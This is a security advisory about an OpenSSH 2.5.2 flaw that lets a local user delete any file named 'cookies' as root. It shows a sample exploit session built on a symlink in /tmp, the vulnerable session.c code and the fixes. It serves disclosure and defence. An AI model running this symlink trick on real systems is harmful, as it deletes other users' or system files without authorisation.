COMMAND

    OpenSSH

SYSTEMS AFFECTED

    OpenSSH

PROBLEM

    'zen-parse'  found  following.   You  can  delete  any file on the
    filesystem you want... as long as its called cookies.  Not  really
    a  very  useful  bug,  but  could  cause  annoyances to people who
    actually like their cookies.

    Sample exploit:

        [root@clarity /root]# touch /cookies;ls /cookies
        /cookies
        [root@clarity /root]# ssh zen@localhost
        zen@localhost's password:
        Last login: Mon Jun  4 20:22:39 2001 from localhost.local
        Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
        [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
        [zen@clarity zen]$ logout
        Connection to localhost closed.
        [root@clarity /root]# ls /cookies
        /bin/ls: /cookies: No such file or directory

    Tested on Red Hat Linux release 7.0 (Guinness):

        [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
        openssh-server-2.5.2p2-1.7.2
        [zen-parse@clarity zen-parse]$ ssh -V
        OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f

    The  configuration  file  has  not  been modified from the default
    settings.  Although sshd does drop root privileges, the  processes
    groups are not cleared. (From /proc/$$/status of the sshd handling
    the  session,  and  the  output  of  strace and ltrace. (no use of
    initgroups in the  ltrace output of  the process that  creates the
    directory, although it does do  change euid before hand. there  no
    setgroups in the strace output.)

    The file itself is  created with O_EXCL so  a symlink in place  of
    the file cannot be used to create/overwrite arbitrary files.

    This vulnerability works  fine on both  RedHat 7.1 &  7.0 with the
    latest updated packages from RedHat installed.

    Jerry  Connolly  tested  it  on  OpenSSH_2.5.2  on  OpenBSD and it
    worked.  He had  to enable X forwarding  on the client and  server
    before the remote machine would create (and attempt to unlink()  )
    the  cookies  file.   The  offending  code  is in session.c in the
    xauthfile_cleanup_proc() function

        <SNIP>
        /*
         * Remove local Xauthority file.
         */
        void
        xauthfile_cleanup_proc(void *ignore)
        {
            debug("xauthfile_cleanup_proc called");

            if (xauthfile != NULL) {
                char *p;
                unlink(xauthfile);
        </SNIP>

    where xauthfile  points to  a buffer  containing the  name of  the
    cookies file.

SOLUTION

    Fixed in openssh's cvs (see www.openssh.com).

    For NetBSD  if you  cannot upgrade  the sshd(8)  binary, make sure
    you have "X11Forwarding no" in your system-wide sshd configuration
    file.  The configuration file is located at /etc/sshd_config  (for
    pkgsrc)  or  /etc/sshd.conf  (in-tree  sshd).   If  you  are using
    openssh from pkgsrc, upgrade it to openssh-2.9p2 or higher.   Make
    sure you have  removed older sshd(8)  binaries.  If  you are using
    ssh from  pkgsrc (security/ssh,  ssh.com implementation),  migrate
    to  openssh  from  pkgsrc  (security/openssh).   If  you are using
    in-tree sshd  (/usr/sbin/sshd), you  may want  to install  openssh
    pkgsrc  (2.9p2  or  later)  and  use /usr/pkg/sbin/sshd instead of
    /usr/sbin/sshd.